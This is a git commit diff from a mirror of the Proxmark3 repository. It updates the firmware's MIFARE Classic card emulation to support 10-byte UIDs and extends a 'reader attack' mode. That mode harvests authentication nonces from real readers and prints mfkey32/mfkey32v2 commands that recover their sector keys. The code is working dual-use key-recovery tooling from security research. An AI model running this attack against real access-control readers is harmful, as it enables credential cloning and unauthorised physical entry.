mirror of
https://github.com/Proxmark/proxmark3.git
synced 2025-07-29 19:18:35 -07:00
update hf mf sim x attack mode - start 10byte uid..
..support (some from @iceman1001) (sim reader attack currently testing std mfkey32 vs mfkey32_moebius version...) possibly will remove one later.
This commit is contained in:
parent
7314995a5a
commit
c872d8c177
9 changed files with 513 additions and 198 deletions
|
@ -15,12 +15,13 @@
|
||||||
#include "util.h"
|
#include "util.h"
|
||||||
#include "string.h"
|
#include "string.h"
|
||||||
#include "cmd.h"
|
#include "cmd.h"
|
||||||
|
|
||||||
#include "iso14443crc.h"
|
#include "iso14443crc.h"
|
||||||
#include "iso14443a.h"
|
#include "iso14443a.h"
|
||||||
#include "crapto1.h"
|
#include "crapto1.h"
|
||||||
#include "mifareutil.h"
|
#include "mifareutil.h"
|
||||||
#include "BigBuf.h"
|
#include "BigBuf.h"
|
||||||
|
#include "protocols.h"
|
||||||
|
|
||||||
static uint32_t iso14a_timeout;
|
static uint32_t iso14a_timeout;
|
||||||
int rsamples = 0;
|
int rsamples = 0;
|
||||||
uint8_t trigger = 0;
|
uint8_t trigger = 0;
|
||||||
|
@ -2324,14 +2325,17 @@ typedef struct {
|
||||||
*
|
*
|
||||||
*@param flags :
|
*@param flags :
|
||||||
* FLAG_INTERACTIVE - In interactive mode, we are expected to finish the operation with an ACK
|
* FLAG_INTERACTIVE - In interactive mode, we are expected to finish the operation with an ACK
|
||||||
* 4B_FLAG_UID_IN_DATA - means that there is a 4-byte UID in the data-section, we're expected to use that
|
* FLAG_4B_UID_IN_DATA - means that there is a 4-byte UID in the data-section, we're expected to use that
|
||||||
* 7B_FLAG_UID_IN_DATA - means that there is a 7-byte UID in the data-section, we're expected to use that
|
* FLAG_7B_UID_IN_DATA - means that there is a 7-byte UID in the data-section, we're expected to use that
|
||||||
|
* FLAG_10B_UID_IN_DATA - use 10-byte UID in the data-section not finished
|
||||||
* FLAG_NR_AR_ATTACK - means we should collect NR_AR responses for bruteforcing later
|
* FLAG_NR_AR_ATTACK - means we should collect NR_AR responses for bruteforcing later
|
||||||
*@param exitAfterNReads, exit simulation after n blocks have been read, 0 is inifite
|
*@param exitAfterNReads, exit simulation after n blocks have been read, 0 is infinite ...
|
||||||
|
* (unless reader attack mode enabled then it runs util it gets enough nonces to recover all keys attmpted)
|
||||||
*/
|
*/
|
||||||
void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *datain)
|
void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *datain)
|
||||||
{
|
{
|
||||||
int cardSTATE = MFEMUL_NOFIELD;
|
int cardSTATE = MFEMUL_NOFIELD;
|
||||||
|
int _UID_LEN = 0; // 4, 7, 10
|
||||||
int _7BUID = 0;
|
int _7BUID = 0;
|
||||||
int vHf = 0; // in mV
|
int vHf = 0; // in mV
|
||||||
int res;
|
int res;
|
||||||
|
@ -2359,24 +2363,31 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
|
||||||
uint8_t rATQA[] = {0x04, 0x00}; // Mifare classic 1k 4BUID
|
uint8_t rATQA[] = {0x04, 0x00}; // Mifare classic 1k 4BUID
|
||||||
uint8_t rUIDBCC1[] = {0xde, 0xad, 0xbe, 0xaf, 0x62};
|
uint8_t rUIDBCC1[] = {0xde, 0xad, 0xbe, 0xaf, 0x62};
|
||||||
uint8_t rUIDBCC2[] = {0xde, 0xad, 0xbe, 0xaf, 0x62}; // !!!
|
uint8_t rUIDBCC2[] = {0xde, 0xad, 0xbe, 0xaf, 0x62}; // !!!
|
||||||
|
uint8_t rUIDBCC3[] = {0xde, 0xad, 0xbe, 0xaf, 0x62};
|
||||||
|
|
||||||
uint8_t rSAK[] = {0x08, 0xb6, 0xdd};
|
uint8_t rSAK[] = {0x08, 0xb6, 0xdd};
|
||||||
uint8_t rSAK1[] = {0x04, 0xda, 0x17};
|
uint8_t rSAK1[] = {0x04, 0xda, 0x17};
|
||||||
|
uint8_t rSAK2[] = {0x04, 0xda, 0x17}; //need to look up
|
||||||
|
|
||||||
uint8_t rAUTH_NT[] = {0x01, 0x02, 0x03, 0x04};
|
uint8_t rAUTH_NT[] = {0x01, 0x02, 0x03, 0x04};
|
||||||
uint8_t rAUTH_AT[] = {0x00, 0x00, 0x00, 0x00};
|
uint8_t rAUTH_AT[] = {0x00, 0x00, 0x00, 0x00};
|
||||||
|
|
||||||
//Here, we collect UID,sector,keytype,NT,AR,NR,NT2,AR2,NR2
|
//Here, we collect UID,sector,keytype,NT,AR,NR,NT2,AR2,NR2
|
||||||
// This can be used in a reader-only attack.
|
// This will be used in the reader-only attack.
|
||||||
// (it can also be retrieved via 'hf 14a list', but hey...
|
|
||||||
|
//allow collecting up to 8 sets of nonces to allow recovery of 8 keys
|
||||||
//allow collecting up to 4 sets of nonces to allow recovery of 4 keys (2 keyA & 2 keyB)
|
#define ATTACK_KEY_COUNT 8
|
||||||
// must be set in multiples of 2 (for 1 keyA and 1 keyB)
|
nonces_t ar_nr_resp[ATTACK_KEY_COUNT*2]; //*2 for 2 separate attack types
|
||||||
#define ATTACK_KEY_COUNT 4
|
|
||||||
nonces_t ar_nr_resp[ATTACK_KEY_COUNT];
|
|
||||||
memset(ar_nr_resp, 0x00, sizeof(ar_nr_resp));
|
memset(ar_nr_resp, 0x00, sizeof(ar_nr_resp));
|
||||||
|
|
||||||
uint8_t ar_nr_collected[ATTACK_KEY_COUNT];
|
uint8_t ar_nr_collected[ATTACK_KEY_COUNT*2];
|
||||||
memset(ar_nr_collected, 0x00, sizeof(ar_nr_collected));
|
memset(ar_nr_collected, 0x00, sizeof(ar_nr_collected));
|
||||||
|
bool collectMoebius = false;
|
||||||
|
uint8_t nonce1_count = 0;
|
||||||
|
uint8_t nonce2_count = 0;
|
||||||
|
uint8_t moebius_n_count = 0;
|
||||||
|
uint8_t mM = 0; //moebius_modifier for collection storage
|
||||||
|
|
||||||
// Authenticate response - nonce
|
// Authenticate response - nonce
|
||||||
uint32_t nonce = bytes_to_num(rAUTH_NT, 4);
|
uint32_t nonce = bytes_to_num(rAUTH_NT, 4);
|
||||||
|
|
||||||
|
@ -2388,45 +2399,98 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
|
||||||
// 4B uid comes from data-portion of packet
|
// 4B uid comes from data-portion of packet
|
||||||
memcpy(rUIDBCC1,datain,4);
|
memcpy(rUIDBCC1,datain,4);
|
||||||
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
|
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
|
||||||
|
_UID_LEN = 4;
|
||||||
} else if (flags & FLAG_7B_UID_IN_DATA) {
|
} else if (flags & FLAG_7B_UID_IN_DATA) {
|
||||||
// 7B uid comes from data-portion of packet
|
// 7B uid comes from data-portion of packet
|
||||||
memcpy(&rUIDBCC1[1],datain,3);
|
memcpy(&rUIDBCC1[1],datain,3);
|
||||||
memcpy(rUIDBCC2, datain+3, 4);
|
memcpy(rUIDBCC2, datain+3, 4);
|
||||||
_7BUID = true;
|
_7BUID = true;
|
||||||
|
_UID_LEN = 7;
|
||||||
|
} else if (flags & FLAG_10B_UID_IN_DATA) {
|
||||||
|
memcpy(&rUIDBCC1[1], datain, 3);
|
||||||
|
memcpy(&rUIDBCC2[1], datain+3, 3);
|
||||||
|
memcpy( rUIDBCC3, datain+6, 4);
|
||||||
|
_UID_LEN = 10;
|
||||||
} else {
|
} else {
|
||||||
// get UID from emul memory
|
// get UID from emul memory - guess at length
|
||||||
emlGetMemBt(receivedCmd, 7, 1);
|
emlGetMemBt(receivedCmd, 7, 1);
|
||||||
_7BUID = !(receivedCmd[0] == 0x00);
|
_7BUID = !(receivedCmd[0] == 0x00);
|
||||||
if (!_7BUID) { // ---------- 4BUID
|
if (!_7BUID) { // ---------- 4BUID
|
||||||
emlGetMemBt(rUIDBCC1, 0, 4);
|
emlGetMemBt(rUIDBCC1, 0, 4);
|
||||||
|
_UID_LEN = 4;
|
||||||
} else { // ---------- 7BUID
|
} else { // ---------- 7BUID
|
||||||
emlGetMemBt(&rUIDBCC1[1], 0, 3);
|
emlGetMemBt(&rUIDBCC1[1], 0, 3);
|
||||||
emlGetMemBt(rUIDBCC2, 3, 4);
|
emlGetMemBt(rUIDBCC2, 3, 4);
|
||||||
|
_UID_LEN = 7;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/*
|
switch (_UID_LEN) {
|
||||||
* Regardless of what method was used to set the UID, set fifth byte and modify
|
case 4:
|
||||||
* the ATQA for 4 or 7-byte UID
|
// save CUID
|
||||||
*/
|
cuid = bytes_to_num(rUIDBCC1, 4);
|
||||||
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
|
// BCC
|
||||||
if (_7BUID) {
|
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
|
||||||
rATQA[0] = 0x44;
|
if (MF_DBGLEVEL >= 2) {
|
||||||
rUIDBCC1[0] = 0x88;
|
Dbprintf("4B UID: %02x%02x%02x%02x",
|
||||||
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
|
rUIDBCC1[0],
|
||||||
rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
|
rUIDBCC1[1],
|
||||||
}
|
rUIDBCC1[2],
|
||||||
|
rUIDBCC1[3]
|
||||||
|
);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case 7:
|
||||||
|
rATQA[0] |= 0x40;
|
||||||
|
// save CUID
|
||||||
|
cuid = bytes_to_num(rUIDBCC2, 4);
|
||||||
|
// CascadeTag, CT
|
||||||
|
rUIDBCC1[0] = 0x88;
|
||||||
|
// BCC
|
||||||
|
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
|
||||||
|
rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
|
||||||
|
if (MF_DBGLEVEL >= 2) {
|
||||||
|
Dbprintf("7B UID: %02x %02x %02x %02x %02x %02x %02x",
|
||||||
|
rUIDBCC1[1],
|
||||||
|
rUIDBCC1[2],
|
||||||
|
rUIDBCC1[3],
|
||||||
|
rUIDBCC2[0],
|
||||||
|
rUIDBCC2[1],
|
||||||
|
rUIDBCC2[2],
|
||||||
|
rUIDBCC2[3]
|
||||||
|
);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case 10:
|
||||||
|
rATQA[0] |= 0x80;
|
||||||
|
//sak_10[0] &= 0xFB;
|
||||||
|
// save CUID
|
||||||
|
cuid = bytes_to_num(rUIDBCC3, 4);
|
||||||
|
// CascadeTag, CT
|
||||||
|
rUIDBCC1[0] = 0x88;
|
||||||
|
rUIDBCC2[0] = 0x88;
|
||||||
|
// BCC
|
||||||
|
rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
|
||||||
|
rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
|
||||||
|
rUIDBCC3[4] = rUIDBCC3[0] ^ rUIDBCC3[1] ^ rUIDBCC3[2] ^ rUIDBCC3[3];
|
||||||
|
|
||||||
if (MF_DBGLEVEL >= 1) {
|
if (MF_DBGLEVEL >= 2) {
|
||||||
if (!_7BUID) {
|
Dbprintf("10B UID: %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x",
|
||||||
Dbprintf("4B UID: %02x%02x%02x%02x",
|
rUIDBCC1[1],
|
||||||
rUIDBCC1[0], rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3]);
|
rUIDBCC1[2],
|
||||||
} else {
|
rUIDBCC1[3],
|
||||||
Dbprintf("7B UID: (%02x)%02x%02x%02x%02x%02x%02x%02x",
|
rUIDBCC2[1],
|
||||||
rUIDBCC1[0], rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3],
|
rUIDBCC2[2],
|
||||||
rUIDBCC2[0], rUIDBCC2[1] ,rUIDBCC2[2], rUIDBCC2[3]);
|
rUIDBCC2[3],
|
||||||
}
|
rUIDBCC3[0],
|
||||||
|
rUIDBCC3[1],
|
||||||
|
rUIDBCC3[2],
|
||||||
|
rUIDBCC3[3]
|
||||||
|
);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
default:
|
||||||
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
// We need to listen to the high-frequency, peak-detected path.
|
// We need to listen to the high-frequency, peak-detected path.
|
||||||
|
@ -2439,9 +2503,8 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
|
||||||
clear_trace();
|
clear_trace();
|
||||||
set_tracing(TRUE);
|
set_tracing(TRUE);
|
||||||
|
|
||||||
|
|
||||||
bool finished = FALSE;
|
bool finished = FALSE;
|
||||||
while (!BUTTON_PRESS() && !finished) {
|
while (!BUTTON_PRESS() && !finished && !usb_poll_validate_length()) {
|
||||||
WDT_HIT();
|
WDT_HIT();
|
||||||
|
|
||||||
// find reader field
|
// find reader field
|
||||||
|
@ -2452,10 +2515,9 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
|
||||||
LED_A_ON();
|
LED_A_ON();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
if(cardSTATE == MFEMUL_NOFIELD) continue;
|
if (cardSTATE == MFEMUL_NOFIELD) continue;
|
||||||
|
|
||||||
//Now, get data
|
//Now, get data
|
||||||
|
|
||||||
res = EmGetCmd(receivedCmd, &len, receivedCmd_par);
|
res = EmGetCmd(receivedCmd, &len, receivedCmd_par);
|
||||||
if (res == 2) { //Field is off!
|
if (res == 2) { //Field is off!
|
||||||
cardSTATE = MFEMUL_NOFIELD;
|
cardSTATE = MFEMUL_NOFIELD;
|
||||||
|
@ -2466,9 +2528,9 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
|
||||||
}
|
}
|
||||||
|
|
||||||
// REQ or WUP request in ANY state and WUP in HALTED state
|
// REQ or WUP request in ANY state and WUP in HALTED state
|
||||||
if (len == 1 && ((receivedCmd[0] == 0x26 && cardSTATE != MFEMUL_HALTED) || receivedCmd[0] == 0x52)) {
|
if (len == 1 && ((receivedCmd[0] == ISO14443A_CMD_REQA && cardSTATE != MFEMUL_HALTED) || receivedCmd[0] == ISO14443A_CMD_WUPA)) {
|
||||||
selTimer = GetTickCount();
|
selTimer = GetTickCount();
|
||||||
EmSendCmdEx(rATQA, sizeof(rATQA), (receivedCmd[0] == 0x52));
|
EmSendCmdEx(rATQA, sizeof(rATQA), (receivedCmd[0] == ISO14443A_CMD_WUPA));
|
||||||
cardSTATE = MFEMUL_SELECT1;
|
cardSTATE = MFEMUL_SELECT1;
|
||||||
|
|
||||||
// init crypto block
|
// init crypto block
|
||||||
|
@ -2499,21 +2561,54 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
|
||||||
Dbprintf("SELECT %02x%02x%02x%02x received",receivedCmd[2],receivedCmd[3],receivedCmd[4],receivedCmd[5]);
|
Dbprintf("SELECT %02x%02x%02x%02x received",receivedCmd[2],receivedCmd[3],receivedCmd[4],receivedCmd[5]);
|
||||||
}
|
}
|
||||||
// select card
|
// select card
|
||||||
|
// check correct sak values... (marshmellow)
|
||||||
if (len == 9 &&
|
if (len == 9 &&
|
||||||
(receivedCmd[0] == 0x93 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC1, 4) == 0)) {
|
(receivedCmd[0] == 0x93 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC1, 4) == 0)) {
|
||||||
EmSendCmd(_7BUID?rSAK1:rSAK, _7BUID?sizeof(rSAK1):sizeof(rSAK));
|
switch(_UID_LEN) {
|
||||||
cuid = bytes_to_num(rUIDBCC1, 4);
|
case 4:
|
||||||
if (!_7BUID) {
|
cardSTATE = MFEMUL_WORK;
|
||||||
cardSTATE = MFEMUL_WORK;
|
LED_B_ON();
|
||||||
LED_B_ON();
|
if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol1 time: %d", GetTickCount() - selTimer);
|
||||||
if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol1 time: %d", GetTickCount() - selTimer);
|
EmSendCmd(rSAK, sizeof(rSAK));
|
||||||
break;
|
break;
|
||||||
} else {
|
case 7:
|
||||||
cardSTATE = MFEMUL_SELECT2;
|
cardSTATE = MFEMUL_SELECT2;
|
||||||
|
EmSendCmd(rSAK1, sizeof(rSAK1));
|
||||||
|
break;
|
||||||
|
case 10:
|
||||||
|
cardSTATE = MFEMUL_SELECT2;
|
||||||
|
EmSendCmd(rSAK2, sizeof(rSAK2));
|
||||||
|
break;
|
||||||
|
default:break;
|
||||||
}
|
}
|
||||||
|
} else {
|
||||||
|
cardSTATE_TO_IDLE();
|
||||||
}
|
}
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
case MFEMUL_SELECT3:{
|
||||||
|
if (!len) {
|
||||||
|
LogTrace(Uart.output, Uart.len, Uart.startTime*16 - DELAY_AIR2ARM_AS_TAG, Uart.endTime*16 - DELAY_AIR2ARM_AS_TAG, Uart.parity, TRUE);
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
if (len == 2 && (receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 && receivedCmd[1] == 0x20)) {
|
||||||
|
EmSendCmd(rUIDBCC3, sizeof(rUIDBCC3));
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
if (len == 9 &&
|
||||||
|
(receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 &&
|
||||||
|
receivedCmd[1] == 0x70 &&
|
||||||
|
memcmp(&receivedCmd[2], rUIDBCC3, 4) == 0) ) {
|
||||||
|
|
||||||
|
EmSendCmd(rSAK2, sizeof(rSAK2));
|
||||||
|
cardSTATE = MFEMUL_WORK;
|
||||||
|
LED_B_ON();
|
||||||
|
if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol3 time: %d", GetTickCount() - selTimer);
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
cardSTATE_TO_IDLE();
|
||||||
|
break;
|
||||||
|
}
|
||||||
case MFEMUL_AUTH1:{
|
case MFEMUL_AUTH1:{
|
||||||
if( len != 8)
|
if( len != 8)
|
||||||
{
|
{
|
||||||
|
@ -2522,43 +2617,67 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
uint32_t ar = bytes_to_num(receivedCmd, 4);
|
uint32_t nr = bytes_to_num(receivedCmd, 4);
|
||||||
uint32_t nr = bytes_to_num(&receivedCmd[4], 4);
|
uint32_t ar = bytes_to_num(&receivedCmd[4], 4);
|
||||||
|
|
||||||
//Collect AR/NR per key/sector
|
//Collect AR/NR per keytype & sector
|
||||||
if(flags & FLAG_NR_AR_ATTACK) {
|
if(flags & FLAG_NR_AR_ATTACK) {
|
||||||
for (uint8_t i = 0; i < ATTACK_KEY_COUNT; i++) {
|
for (uint8_t i = 0; i < ATTACK_KEY_COUNT; i++) {
|
||||||
if(cardAUTHKEY > 0 && i < (ATTACK_KEY_COUNT/2) ) {
|
if ( ar_nr_collected[i+mM]==0 || (cardAUTHSC == ar_nr_resp[i+mM].sector && cardAUTHKEY == ar_nr_resp[i+mM].keytype && ar_nr_collected[i+mM] > 0) ) {
|
||||||
i=ATTACK_KEY_COUNT/2; //keyB skip to keyB
|
// if first auth for sector, or matches sector and keytype of previous auth
|
||||||
} else if (cardAUTHKEY == 0 && i == ATTACK_KEY_COUNT/2) {
|
if (ar_nr_collected[i+mM] < 2) {
|
||||||
break; //should not get here - quit
|
// if we haven't already collected 2 nonces for this sector
|
||||||
}
|
if (ar_nr_resp[ar_nr_collected[i+mM]].ar != ar) {
|
||||||
// if first auth for sector, or matches sector of previous auth
|
// Avoid duplicates... probably not necessary, ar should vary.
|
||||||
if ( ar_nr_collected[i]==0 || (cardAUTHSC == ar_nr_resp[i].sector && ar_nr_collected[i] > 0) ) {
|
if (ar_nr_collected[i+mM]==0) {
|
||||||
if(ar_nr_collected[i] < 2) {
|
// first nonce collect
|
||||||
if(ar_nr_resp[ar_nr_collected[i]].ar != ar)
|
ar_nr_resp[i+mM].cuid = cuid;
|
||||||
{// Avoid duplicates... probably not necessary, ar should vary.
|
ar_nr_resp[i+mM].sector = cardAUTHSC;
|
||||||
if (ar_nr_collected[i]==0) {
|
ar_nr_resp[i+mM].keytype = cardAUTHKEY;
|
||||||
ar_nr_resp[i].cuid = cuid;
|
ar_nr_resp[i+mM].nonce = nonce;
|
||||||
ar_nr_resp[i].sector = cardAUTHSC;
|
ar_nr_resp[i+mM].nr = nr;
|
||||||
ar_nr_resp[i].nonce = nonce;
|
ar_nr_resp[i+mM].ar = ar;
|
||||||
ar_nr_resp[i].ar = ar;
|
nonce1_count++;
|
||||||
ar_nr_resp[i].nr = nr;
|
//add this nonce to first moebius nonce
|
||||||
} else {
|
ar_nr_resp[i+ATTACK_KEY_COUNT].cuid = cuid;
|
||||||
ar_nr_resp[i].ar2 = ar;
|
ar_nr_resp[i+ATTACK_KEY_COUNT].sector = cardAUTHSC;
|
||||||
ar_nr_resp[i].nr2 = nr;
|
ar_nr_resp[i+ATTACK_KEY_COUNT].keytype = cardAUTHKEY;
|
||||||
|
ar_nr_resp[i+ATTACK_KEY_COUNT].nonce = nonce;
|
||||||
|
ar_nr_resp[i+ATTACK_KEY_COUNT].nr = nr;
|
||||||
|
ar_nr_resp[i+ATTACK_KEY_COUNT].ar = ar;
|
||||||
|
ar_nr_collected[i+ATTACK_KEY_COUNT]++;
|
||||||
|
} else { //second nonce collect (std and moebius)
|
||||||
|
ar_nr_resp[i+mM].nonce2 = nonce;
|
||||||
|
ar_nr_resp[i+mM].nr2 = nr;
|
||||||
|
ar_nr_resp[i+mM].ar2 = ar;
|
||||||
|
if (!collectMoebius) {
|
||||||
|
nonce2_count++;
|
||||||
|
//check if this was the last second nonce we need for std attack
|
||||||
|
if ( nonce2_count == nonce1_count ) {
|
||||||
|
//done collecting std test switch to moebius
|
||||||
|
collectMoebius = true;
|
||||||
|
mM = ATTACK_KEY_COUNT;
|
||||||
|
nonce = nonce*7;
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
moebius_n_count++;
|
||||||
|
//if we've collected all the nonces we need - finish.
|
||||||
|
if (nonce1_count == moebius_n_count) finished = true;
|
||||||
|
}
|
||||||
}
|
}
|
||||||
ar_nr_collected[i]++;
|
ar_nr_collected[i+mM]++;
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
} else { //already collected 2 nonces for sector - reader looping? - quit
|
||||||
|
//finished = true;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// --- crypto
|
// --- crypto
|
||||||
crypto1_word(pcs, ar , 1);
|
crypto1_word(pcs, nr , 1);
|
||||||
cardRr = nr ^ crypto1_word(pcs, 0, 0);
|
cardRr = ar ^ crypto1_word(pcs, 0, 0);
|
||||||
|
|
||||||
// test if auth OK
|
// test if auth OK
|
||||||
if (cardRr != prng_successor(nonce, 64)){
|
if (cardRr != prng_successor(nonce, 64)){
|
||||||
|
@ -2600,11 +2719,19 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
|
||||||
// select 2 card
|
// select 2 card
|
||||||
if (len == 9 &&
|
if (len == 9 &&
|
||||||
(receivedCmd[0] == 0x95 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC2, 4) == 0)) {
|
(receivedCmd[0] == 0x95 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC2, 4) == 0)) {
|
||||||
|
//which sak now? (marshmellow)
|
||||||
EmSendCmd(rSAK, sizeof(rSAK));
|
EmSendCmd(rSAK, sizeof(rSAK));
|
||||||
cuid = bytes_to_num(rUIDBCC2, 4);
|
switch(_UID_LEN) {
|
||||||
cardSTATE = MFEMUL_WORK;
|
case 7:
|
||||||
LED_B_ON();
|
cardSTATE = MFEMUL_WORK;
|
||||||
if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol2 time: %d", GetTickCount() - selTimer);
|
LED_B_ON();
|
||||||
|
if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol2 time: %d", GetTickCount() - selTimer);
|
||||||
|
break;
|
||||||
|
case 10:
|
||||||
|
cardSTATE = MFEMUL_SELECT3;
|
||||||
|
break;
|
||||||
|
default:break;
|
||||||
|
}
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -2632,11 +2759,20 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
|
||||||
}
|
}
|
||||||
|
|
||||||
if (len == 4 && (receivedCmd[0] == 0x60 || receivedCmd[0] == 0x61)) {
|
if (len == 4 && (receivedCmd[0] == 0x60 || receivedCmd[0] == 0x61)) {
|
||||||
|
if (receivedCmd[1] >= 16 * 4) {
|
||||||
|
//is this the correct response to an auth on a out of range block? marshmellow
|
||||||
|
EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
|
||||||
|
if (MF_DBGLEVEL >= 2) Dbprintf("Reader tried to operate (0x%02x) on out of range block: %d (0x%02x), nacking",receivedCmd[0],receivedCmd[1],receivedCmd[1]);
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
authTimer = GetTickCount();
|
authTimer = GetTickCount();
|
||||||
cardAUTHSC = receivedCmd[1] / 4; // received block num
|
cardAUTHSC = receivedCmd[1] / 4; // received block num
|
||||||
cardAUTHKEY = receivedCmd[0] - 0x60;
|
cardAUTHKEY = receivedCmd[0] - 0x60;
|
||||||
crypto1_destroy(pcs);//Added by martin
|
crypto1_destroy(pcs);//Added by martin
|
||||||
crypto1_create(pcs, emlGetKey(cardAUTHSC, cardAUTHKEY));
|
crypto1_create(pcs, emlGetKey(cardAUTHSC, cardAUTHKEY));
|
||||||
|
//uint64_t key=emlGetKey(cardAUTHSC, cardAUTHKEY);
|
||||||
|
//Dbprintf("key: %04x%08x",(uint32_t)(key>>32)&0xFFFF,(uint32_t)(key&0xFFFFFFFF));
|
||||||
|
|
||||||
if (!encrypted_data) { // first authentication
|
if (!encrypted_data) { // first authentication
|
||||||
if (MF_DBGLEVEL >= 4) Dbprintf("Reader authenticating for block %d (0x%02x) with key %d",receivedCmd[1] ,receivedCmd[1],cardAUTHKEY );
|
if (MF_DBGLEVEL >= 4) Dbprintf("Reader authenticating for block %d (0x%02x) with key %d",receivedCmd[1] ,receivedCmd[1],cardAUTHKEY );
|
||||||
|
@ -2826,19 +2962,33 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
|
||||||
Dbprintf("../tools/mfkey/mfkey32 %08x %08x %08x %08x %08x %08x",
|
Dbprintf("../tools/mfkey/mfkey32 %08x %08x %08x %08x %08x %08x",
|
||||||
ar_nr_resp[i].cuid, //UID
|
ar_nr_resp[i].cuid, //UID
|
||||||
ar_nr_resp[i].nonce, //NT
|
ar_nr_resp[i].nonce, //NT
|
||||||
ar_nr_resp[i].ar, //AR1
|
|
||||||
ar_nr_resp[i].nr, //NR1
|
ar_nr_resp[i].nr, //NR1
|
||||||
ar_nr_resp[i].ar2, //AR2
|
ar_nr_resp[i].ar, //AR1
|
||||||
ar_nr_resp[i].nr2 //NR2
|
ar_nr_resp[i].nr2, //NR2
|
||||||
|
ar_nr_resp[i].ar2 //AR2
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
for ( uint8_t i = ATTACK_KEY_COUNT; i < ATTACK_KEY_COUNT*2; i++) {
|
||||||
|
if (ar_nr_collected[i] == 2) {
|
||||||
|
Dbprintf("Collected two pairs of AR/NR which can be used to extract %s from reader for sector %d:", (i<ATTACK_KEY_COUNT/2) ? "keyA" : "keyB", ar_nr_resp[i].sector);
|
||||||
|
Dbprintf("../tools/mfkey/mfkey32v2 %08x %08x %08x %08x %08x %08x %08x",
|
||||||
|
ar_nr_resp[i].cuid, //UID
|
||||||
|
ar_nr_resp[i].nonce, //NT
|
||||||
|
ar_nr_resp[i].nr, //NR1
|
||||||
|
ar_nr_resp[i].ar, //AR1
|
||||||
|
ar_nr_resp[i].nonce2,//NT2
|
||||||
|
ar_nr_resp[i].nr2, //NR2
|
||||||
|
ar_nr_resp[i].ar2 //AR2
|
||||||
|
);
|
||||||
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
if (MF_DBGLEVEL >= 1) Dbprintf("Emulator stopped. Tracing: %d trace length: %d ", tracing, BigBuf_get_traceLen());
|
if (MF_DBGLEVEL >= 1) Dbprintf("Emulator stopped. Tracing: %d trace length: %d ", tracing, BigBuf_get_traceLen());
|
||||||
|
|
||||||
if(flags & FLAG_INTERACTIVE)// Interactive mode flag, means we need to send ACK
|
